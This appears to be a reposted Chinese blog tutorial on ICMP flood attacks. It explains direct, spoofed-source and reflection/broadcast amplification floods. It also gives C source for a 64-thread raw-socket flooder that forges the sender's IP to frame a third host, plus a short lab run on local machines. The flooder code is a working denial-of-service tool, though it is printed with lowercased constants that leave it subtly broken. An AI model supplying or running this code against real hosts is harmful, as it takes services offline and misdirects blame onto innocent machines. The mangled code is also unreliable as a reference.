欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

Linux编程之ICMP洪水攻击

程序员文章站 2023-10-27 20:14:10
我的上一篇文章《linux编程之ping的实现》里使用icmp协议实现了ping的程序,icmp除了实现这么一个ping程序,还有哪些不为人知或者好玩的用途?这里我将介绍i...

我的上一篇文章《linux编程之ping的实现》里使用icmp协议实现了ping的程序,icmp除了实现这么一个ping程序,还有哪些不为人知或者好玩的用途?这里我将介绍icmp另一个很有名的黑科技:icmp洪水攻击。 

icmp洪水攻击属于大名鼎鼎的dos(denial of service)攻击的一种,一种是黑客们喜欢的攻击手段,这里本着加深自己对icmp的理解的目的,也试着基于icmp写一段icmp的洪水攻击小程序。 

洪水攻击(flood attack)指的是利用计算机网络技术向目的主机发送大量无用数据报文,使得目的主机忙于处理无用的数据报文而无法提供正常服务的网络行为。

icmp洪水攻击:顾名思义,就是对目的主机发送洪水般的ping包,使得目的主机忙于处理ping包而无能力处理其他正常请求,这就好像是洪水一般的ping包把目的主机给淹没了。 

要实现icmp的洪水攻击,需要以下三项的知识储备:

  • dos攻击原理
  • icmp的深入理解
  • 原始套接字的编程技巧

一、icmp洪水攻击原理

icmp洪水攻击是在ping的基础上形成的,但是ping程序很少能造成目的及宕机的问题,这是因为ping的发送包的速率太慢了,像我实现的ping程序里ping包发送速率限定在1秒1发,这个速率目的主机处理ping包还是绰绰有余的。所以要造成“洪水”的现象,就必须提升发包速率。这里介绍三种icmp洪水攻击的方式: 

(1)直接洪水攻击

这样做需要本地主机的带宽和目的主机的带宽之间进行比拼,比如我的主机网络带宽是30m的,而你的主机网络带宽仅为3m,那我发起洪水攻击淹没你的主机成功率就很大了。这种攻击方式要求攻击主机处理能力和带宽要大于被攻击主机,否则自身被dos了。基于这种思想,我们可以使用一台高带宽高性能的电脑,采用多线程的方法一次性发送多个icmp请求报文,让目的主机忙于处理大量这些报文而造成速度缓慢甚至宕机。这个方法有个大缺点,就是对方可以根据icmp包的ip地址而屏蔽掉攻击源,使得攻击不能继续。 

(2)伪ip攻击

在直接洪水攻击的基础上,我们将发送方的ip地址伪装成其他ip,如果是伪装成一个随机的ip,那就可以很好地隐藏自己的位置;如果将自己的ip伪装成其他受害者的ip,就会造成“挑拨离间”的情形,受害主机1的icmp回复包也如洪水般发送给受害主机2,如果主机1的管理员要查是哪个混蛋发包攻击自己,他一查icmp包的源地址,咦原来是主机2,这样子主机2就成了戴罪羔羊了。 

(3)反射攻击

这类攻击的思想不同于上面两种攻击,反射攻击的设计更为巧妙。其实这里的方式三的攻击模式是前两个模式的合并版以及升级版,方式三的攻击策略有点像“借刀杀人“,反射攻击不再直接对目标主机,而是让其他一群主机误以为目标主机在向他们发送icmp请求包,然后一群主机向目的主机发送icmp应答包,造成来自四面八方的洪水淹没目的主机的现象。比如我们向局域网的其他主机发送icmp请求包,然后自己的ip地址伪装成目的主机的ip,这样子目的主机就成了icmp回显的焦点了。这种攻击非常隐蔽,因为受害主机很难查出攻击源是谁。 

Linux编程之ICMP洪水攻击

二、icmp洪水攻击程序设计

这里我想实现一个icmp洪水攻击的例子,这里我想采用方式二来进行设计。虽说方式三的“借刀杀人”更为巧妙,其实也是由方式二的伪装方式进一步延伸的,实现起来也是大同小异。 

首先给出攻击的模型图:

Linux编程之ICMP洪水攻击

1.组icmp包

这里的组包跟编写ping程序时的组包没太大差别,唯一需要注意的是,我们需要填写ip头部分,因为我们要伪装源地址,做到嫁祸于人。

void dos_icmp_pack(char* packet)
{
  struct ip* ip_hdr = (struct ip*)packet;
  struct icmp* icmp_hdr = (struct icmp*)(packet + sizeof(struct ip));

  ip_hdr->ip_v = 4;
  ip_hdr->ip_hl = 5;
  ip_hdr->ip_tos = 0;
  ip_hdr->ip_len = htons(icmp_packet_size);
  ip_hdr->ip_id = htons(getpid());
  ip_hdr->ip_off = 0;
  ip_hdr->ip_ttl = 64;
  ip_hdr->ip_p = proto_icmp;
  ip_hdr->ip_sum = 0;
  ip_hdr->ip_src.s_addr = inet_addr(fake_ip);; //伪装源地址
  ip_hdr->ip_dst.s_addr = dest; //填入要攻击的目的主机地址

  icmp_hdr->icmp_type = icmp_echo;
  icmp_hdr->icmp_code = 0;
  icmp_hdr->icmp_cksum = htons(~(icmp_echo << 8));
  //注意这里,因为数据部分为0,我们就简化了一下checksum的计算了
}

2.搭建发包线程

void dos_attack()
{
  char* packet = (char*)malloc(icmp_packet_size);
  memset(packet, 0, icmp_packet_size);
  struct sockaddr_in to;
  dos_icmp_pack(packet);

  to.sin_family = af_inet;
  to.sin_addr.s_addr = dest;
  to.sin_port = htons(0);

  while(alive) //控制发包的全局变量
  {
    sendto(rawsock, packet, icmp_packet_size, 0, (struct sockaddr*)&to, sizeof(struct sockaddr));    
  }

  free(packet); //记得要释放内存
}

3.编写发包开关

这里的开关很简单,用信号量+全局变量即可以实现。当我们按下ctrl+c时,攻击将关闭。

void dos_sig()
{
  alive = 0;
  printf("stop dos attack!\n");
}

 4.总的架构

我们使用了64个线程一起发包,当然这个线程数还可以大大增加,来增加攻击强度。但我们只是做做实验,没必要搞那么大。

int main(int argc, char* argv[])
{
  struct hostent* host = null;
  struct protoent* protocol = null;
  int i;
  alive = 1;
  pthread_t attack_thread[thread_max_num]; //开64个线程同时发包  
  int err = 0;

  if(argc < 2)
  {
    printf("invalid input!\n");
    return -1;
  }

  signal(sigint, dos_sig);

  protocol = getprotobyname(proto_name);
  if(protocol == null)
  {
    printf("fail to getprotobyname!\n");
    return -1;
  }

  proto_icmp = protocol->p_proto;

  dest = inet_addr(argv[1]);

  if(dest == inaddr_none)
  {
    host = gethostbyname(argv[1]);
    if(host == null)
    {
      printf("invalid ip or domain name!\n");
      return -1;
    }
    memcpy((char*)&dest, host->h_addr, host->h_length);

  }

  rawsock = socket(af_inet, sock_raw, proto_icmp);
  if(rawsock < 0)
  {
    printf("fait to create socket!\n");
    return -1;
  }

  setsockopt(rawsock, sol_ip, ip_hdrincl, "1", sizeof("1"));

  printf("icmp flood attack start\n");

  for(i=0;i<thread_max_num;i++)
  {
    err = pthread_create(&(attack_thread[i]), null, (void*)dos_attack, null);
    if(err)
    {
      printf("fail to create thread, err %d, thread id : %d\n",err, attack_thread[i]);      
    }
  }

  for(i=0;i<thread_max_num;i++)
  {
    pthread_join(attack_thread[i], null);  //等待线程结束
  }

  printf("icmp attack finishi!\n");

  close(rawsock);

  return 0;
}

三、实验

本次实验本着学习的目的,想利用自己手上的设备,想进一步理解网络和协议的应用,所以攻击的幅度比较小,时间也就几秒,不对任何设备造成影响。 

再说一下我们的攻击步骤:我们使用主机172.0.5.183作为自己的攻击主机,并将自己伪装成主机172.0.5.182,对主机172.0.5.9发起icmp洪水攻击。

攻击开始

Linux编程之ICMP洪水攻击

我们观察一下”受害者“那边的情况。在短短5秒里,正确收到并交付上层处理的包也高达7万多个了。我也不敢多搞事,避免影响机器工作。

Linux编程之ICMP洪水攻击

使用wireshark抓包再瞧一瞧,满满的icmp包啊,看来量也是很大的。icmp包的源地址显示为172.0.5.182(我们伪装的地址),它也把echo reply回给了172.0.5.182。主机172.0.5.182肯定会想,莫名其妙啊,怎么收到这么多echo reply包。

Linux编程之ICMP洪水攻击

攻击实验做完了。  

现在更为流行的是ddos攻击,其威力更为强悍,策略更为精巧,防御难度也更加高。
其实,这种ddos攻击也是在dos的基础上发起的,具体步骤如下: 

    1. 攻击者向“放大网络”广播echo request报文
    2. 攻击者指定广播报文的源ip为被攻击主机
    3. “放大网络”回复echo reply给被攻击主机
    4. 形成ddos攻击场景 

这里的“放大网络”可以理解为具有很多主机的网络,这些主机的操作系统需要支持对目的地址为广播地址的某种icmp请求数据包进行响应。 

攻击策略很精妙,简而言之,就是将源地址伪装成攻击主机的ip,然后发广播的给所有主机,主机们收到该echo request后集体向攻击主机回包,造成群起而攻之的情景。

以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持。